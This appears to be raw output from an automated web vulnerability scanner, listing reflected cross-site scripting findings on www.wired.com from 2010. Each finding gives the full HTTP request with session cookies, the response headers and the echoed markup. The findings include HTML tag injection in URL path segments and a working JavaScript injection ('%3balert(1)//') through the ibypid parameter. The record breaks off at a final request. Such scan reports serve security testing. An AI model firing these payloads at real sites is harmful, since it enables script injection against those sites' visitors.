This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaminga4899"><a>1ca469d09ed HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29382 Vary: Accept-Encoding Cache-Control: max-age=222 Expires: Mon, 22 Nov 2010 01:15:04 GMT Date: Mon, 22 Nov 2010 01:11:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaminga4899"><a>1ca469d09ed"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b691"><a>f527151e420 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming3b691"><a>f527151e420/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29383 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 20:18:56 GMT Date: Sun, 21 Nov 2010 20:14:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming3b691"><a>f527151e420"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e36d"><a>49ae0050530 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming5e36d"><a>49ae0050530/gamingreviews HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29413 Vary: Accept-Encoding Cache-Control: max-age=232 Expires: Sun, 21 Nov 2010 23:12:30 GMT Date: Sun, 21 Nov 2010 23:08:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming5e36d"><a>49ae0050530 ss_gamingreviews"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de64"><a>eaff00508ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming/gamingreviews1de64"><a>eaff00508ec HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29413 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:07 GMT Date: Sun, 21 Nov 2010 23:09:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming ss_gamingreviews1de64"><a>eaff00508ec"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e9a"><a>5d92c74d73d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gamingc5e9a"><a>5d92c74d73d/hardware HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29403 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:26 GMT Date: Sun, 21 Nov 2010 23:08:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gamingc5e9a"><a>5d92c74d73d ss_hardware"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 511f3"><a>a929ebce08d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming/hardware511f3"><a>a929ebce08d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29403 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:03 GMT Date: Sun, 21 Nov 2010 23:09:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming ss_hardware511f3"><a>a929ebce08d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdcfc"><a>0a261e4d294 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gamingbdcfc"><a>0a261e4d294/virtualworlds HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29413 Vary: Accept-Encoding Cache-Control: max-age=226 Expires: Sun, 21 Nov 2010 23:12:23 GMT Date: Sun, 21 Nov 2010 23:08:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gamingbdcfc"><a>0a261e4d294 ss_virtualworlds"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bbd"><a>49da4046a0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming/virtualworlds97bbd"><a>49da4046a0e HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29413 Vary: Accept-Encoding Cache-Control: max-age=575 Expires: Sun, 21 Nov 2010 23:18:45 GMT Date: Sun, 21 Nov 2010 23:09:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming ss_virtualworlds97bbd"><a>49da4046a0e"> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 96627%3balert(1)//343adadbdb2 was submitted in the ibypid parameter. This input was echoed as 96627;alert(1)//343adadbdb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/electric-car-grid/?ibypid=596627%3balert(1)//343adadbdb2 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:33 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=445 Expires: Sun, 21 Nov 2010 23:21:58 GMT Date: Sun, 21 Nov 2010 23:14:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 101588
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 596627;alert(1)//343adadbdb2;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31876%3balert(1)//b8b3883cd7f was submitted in the ibypid parameter. This input was echoed as 31876;alert(1)//b8b3883cd7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/events-calendar?ibypid=231876%3balert(1)//b8b3883cd7f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:13 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:13 GMT Date: Sun, 21 Nov 2010 23:14:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 101948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 231876;alert(1)//b8b3883cd7f;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 53f8c%3balert(1)//63f97596e7a was submitted in the ibypid parameter. This input was echoed as 53f8c;alert(1)//63f97596e7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/must-sees/?ibypid=453f8c%3balert(1)//63f97596e7a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:18 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:18 GMT Date: Sun, 21 Nov 2010 23:14:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 103981
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 453f8c;alert(1)//63f97596e7a;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 985e3%3balert(1)//29173f1a6e4 was submitted in the ibypid parameter. This input was echoed as 985e3;alert(1)//29173f1a6e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/the-list?ibypid=3985e3%3balert(1)//29173f1a6e4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:17 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:17 GMT Date: Sun, 21 Nov 2010 23:14:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 104027
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 3985e3;alert(1)//29173f1a6e4;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9281f%3balert(1)//1442148a2f4 was submitted in the ibypid parameter. This input was echoed as 9281f;alert(1)//1442148a2f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/tweetcarts?ibypid=19281f%3balert(1)//1442148a2f4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:09 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=447 Expires: Sun, 21 Nov 2010 23:21:37 GMT Date: Sun, 21 Nov 2010 23:14:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 102331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 19281f;alert(1)//1442148a2f4;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a7a08%3balert(1)//72fe6adb542 was submitted in the ibypid parameter. This input was echoed as a7a08;alert(1)//72fe6adb542 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/08/english-japanese-emoticon-translator/?ibypid=6a7a08%3balert(1)//72fe6adb542 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:28 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=446 Expires: Sun, 21 Nov 2010 23:21:55 GMT Date: Sun, 21 Nov 2010 23:14:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 109190
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 6a7a08;alert(1)//72fe6adb542;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 67c96%3balert(1)//9c87be7eadf was submitted in the ibypid parameter. This input was echoed as 67c96;alert(1)//9c87be7eadf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/08/top-ten-most-popular-celebrities/?ibypid=767c96%3balert(1)//9c87be7eadf HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:24 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:24 GMT Date: Sun, 21 Nov 2010 23:14:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 767c96;alert(1)//9c87be7eadf;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f56c8%3balert(1)//bb7f19b9979 was submitted in the ibypid parameter. This input was echoed as f56c8;alert(1)//bb7f19b9979 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/09/ascent-of-robot/?ibypid=9f56c8%3balert(1)//bb7f19b9979 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:39 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:39 GMT Date: Sun, 21 Nov 2010 23:14:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 105063
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 9f56c8;alert(1)//bb7f19b9979;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c43e3%3balert(1)//d95607fec28 was submitted in the ibypid parameter. This input was echoed as c43e3;alert(1)//d95607fec28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/09/bittorrent-or-box-office/?ibypid=11c43e3%3balert(1)//d95607fec28 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
